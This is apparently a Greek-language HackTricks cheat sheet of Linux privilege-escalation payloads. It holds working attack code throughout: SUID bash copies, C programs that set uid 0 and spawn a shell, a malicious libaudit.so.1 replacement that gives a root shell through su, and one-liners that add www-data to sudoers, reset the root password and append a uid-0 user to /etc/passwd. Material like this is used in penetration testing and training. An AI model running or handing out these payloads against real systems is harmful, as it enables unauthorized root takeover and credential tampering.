# Payloads to execute {{#include ../../banners/hacktricks-training.md}} ## Bash ```bash cp /bin/bash /tmp/b && chmod +s /tmp/b /bin/b -p #Maintains root privileges from suid, working in debian & buntu ``` ## Γ ```c //gcc payload.c -o payload int main(void){ setresuid(0, 0, 0); //Set as user suid user system("/bin/sh"); return 0; } ``` ```c //gcc payload.c -o payload #include #include #include int main(){ setuid(getuid()); system("/bin/bash"); return 0; } ``` ```c // Privesc to user id: 1000 #define _GNU_SOURCE #include #include int main(void) { char *const paramList[10] = {"/bin/bash", "-p", NULL}; const int id = 1000; setresuid(id, id, id); execve(paramList[0], paramList, NULL); return 0; } ``` ## Επικαλύπτοντας ένα αρχείο για την κλιμάκωση δικαιωμάτων ### Κοινά αρχεία - Προσθέστε χρήστη με κωδικό πρόσβασης στο _/etc/passwd_ - Αλλάξτε τον κωδικό πρόσβασης μέσα στο _/etc/shadow_ - Προσθέστε χρήστη στους sudoers στο _/etc/sudoers_ - Καταχρήστε το docker μέσω του docker socket, συνήθως στο _/run/docker.sock_ ή _/var/run/docker.sock_ ### Επικαλύπτοντας μια βιβλιοθήκη Ελέγξτε μια βιβλιοθήκη που χρησιμοποιείται από κάποιο δυαδικό, σε αυτή την περίπτωση `/bin/su`: ```bash ldd /bin/su linux-vdso.so.1 (0x00007ffef06e9000) libpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000) libpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000) libaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000) libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000) libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000) libcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000) /lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000) ``` Σε αυτή την περίπτωση, ας προσπαθήσουμε να προσποιηθούμε το `/lib/x86_64-linux-gnu/libaudit.so.1`.\ Έτσι, ελέγξτε τις συναρτήσεις αυτής της βιβλιοθήκης που χρησιμοποιούνται από το **`su`** δυαδικό: ```bash objdump -T /bin/su | grep audit 0000000000000000 DF *UND* 0000000000000000 audit_open 0000000000000000 DF *UND* 0000000000000000 audit_log_user_message 0000000000000000 DF *UND* 0000000000000000 audit_log_acct_message 000000000020e968 g DO .bss 0000000000000004 Base audit_fd ``` Τα σύμβολα `audit_open`, `audit_log_acct_message`, `audit_log_acct_message` και `audit_fd` προέρχονται πιθανώς από τη βιβλιοθήκη libaudit.so.1. Καθώς η libaudit.so.1 θα αντικατασταθεί από τη κακόβουλη κοινή βιβλιοθήκη, αυτά τα σύμβολα θα πρέπει να είναι παρόντα στη νέα κοινή βιβλιοθήκη, διαφορετικά το πρόγραμμα δεν θα μπορεί να βρει το σύμβολο και θα τερματιστεί. ```c #include #include #include //gcc -shared -o /lib/x86_64-linux-gnu/libaudit.so.1 -fPIC inject.c int audit_open; int audit_log_acct_message; int audit_log_user_message; int audit_fd; void inject()__attribute__((constructor)); void inject() { setuid(0); setgid(0); system("/bin/bash"); } ``` Τώρα, απλά καλώντας **`/bin/su`** θα αποκτήσετε ένα shell ως root. ## Scripts Μπορείτε να κάνετε τον root να εκτελέσει κάτι; ### **www-data σε sudoers** ```bash echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update ``` ### **Αλλαγή κωδικού πρόσβασης root** ```bash echo "root:hacked" | chpasswd ``` ### Προσθήκη νέου χρήστη root στο /etc/passwd ```bash echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd ``` {{#include ../../banners/hacktricks-training.md}}